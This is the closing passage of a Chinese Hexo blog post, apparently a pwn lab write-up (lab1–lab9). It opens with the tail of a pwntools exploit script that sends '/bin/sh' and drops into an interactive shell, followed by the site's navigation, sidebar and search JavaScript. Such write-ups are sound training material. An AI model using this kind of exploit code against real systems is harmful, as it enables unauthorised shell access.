class="line">	<span class="keyword">if</span> data.find(<span class="string">"n0va"</span>) != <span class="number">-1</span>:</span><br><span class="line">		<span class="keyword">break</span></span><br><span class="line">p.sendline(<span class="string">'/bin/sh'</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/03/28/hackme.inndy之pwn/" rel="next" title="hackme.inndy之pwn">
                <i class="fa fa-chevron-left"></i> hackme.inndy之pwn
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/04/04/pwn入门之ROP/" rel="prev" title="pwn入门之ROP">
                pwn入门之ROP <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/n0va.jpg" alt="n0va">
            
              <p class="site-author-name" itemprop="name">n0va</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#lab1"><span class="nav-number">1.</span> <span class="nav-text">lab1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#lab2"><span class="nav-number">2.</span> <span class="nav-text">lab2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#lab3"><span class="nav-number">3.</span> <span class="nav-text">lab3</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#lab4"><span class="nav-number">4.</span> <span class="nav-text">lab4</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#lab5"><span class="nav-number">5.</span> <span class="nav-text">lab5</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#lab6"><span class="nav-number">6.</span> <span class="nav-text">lab6</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#lab7"><span class="nav-number">7.</span> <span class="nav-text">lab7</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#lab8"><span class="nav-number">8.</span> <span class="nav-text">lab8</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#lab9"><span class="nav-number">9.</span> <span class="nav-text">lab9</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">n0va</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
